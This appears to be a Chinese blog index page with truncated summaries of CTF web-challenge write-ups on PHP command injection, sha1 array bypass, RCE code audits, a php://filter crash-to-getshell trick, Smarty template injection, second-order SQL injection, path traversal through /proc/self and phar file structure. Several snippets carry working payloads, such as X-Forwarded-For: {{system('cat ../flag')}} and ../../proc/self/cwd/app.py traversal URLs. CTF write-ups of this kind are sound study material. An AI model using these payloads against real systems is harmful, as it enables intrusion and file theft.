摘要:
源码: $flag = "#flag in /flag"; $comm1 = '"' . $comm1 . '"'; $comm2 = '"' . $comm2 . '"'; $cmd = "file $comm1 $comm2"; system($cmd); ?> payload:?comm1=i 阅读全文
摘要:
报错405换请求方法 shal()函数用数组绕过 post传参: roam1[]=1&roam2[]=2 shal()函数的结果是一样的 阅读全文
摘要:
打开就是一个代码审计: <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match(" 阅读全文
摘要:
捞到代码,在本地搭建,源码(rce.php): <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if( 阅读全文
摘要:
使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,再进行文件名爆破就可以getshell php://filter/string.strip_tags使用条件: •php7.0.0-7 阅读全文
摘要:
smarty模板注入是在请求报文里X-Forwarded-For处进行操作的 X-Forwarded-For: {{system("ls /")}} X-Forwarded-For: {{system("cat ../../../../../../../flag")}} 阅读全文
摘要:
首先,这是一个二次注入,先insert into 到文章表,填字段的时候想着查询语句的结构,填写恶意语句。 输入过滤了or、注释符 or被过滤了,影响很大,第一不能order by 了,得union select慢慢试,最要紧的是information_schema不能用了,这个内置库不能用的话,就 阅读全文
摘要:
建议前期实行web三件套的时候就开着代理。 看到bot,想到robots.txt,得到: User-agent: * Disallow: /fAke_f1agggg.php 抓包访问,返回包中有一个Look_at_me: /fl4g.php 访问,得到源码: <?php header('Conten 阅读全文
摘要:
主页有个get型的url传参,?url=../../../../../proc/self/cmdline 回显是python3 app.py 然后通过?url=../../../../../proc/self/cwd/app.py看当前的app.py的源码 审计源码: from flask impo 阅读全文
摘要:
1.phar文件结构 1.A stub 可以理解为一个标志,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件,比如Stub部分可以是:GIF89a<?ph 阅读全文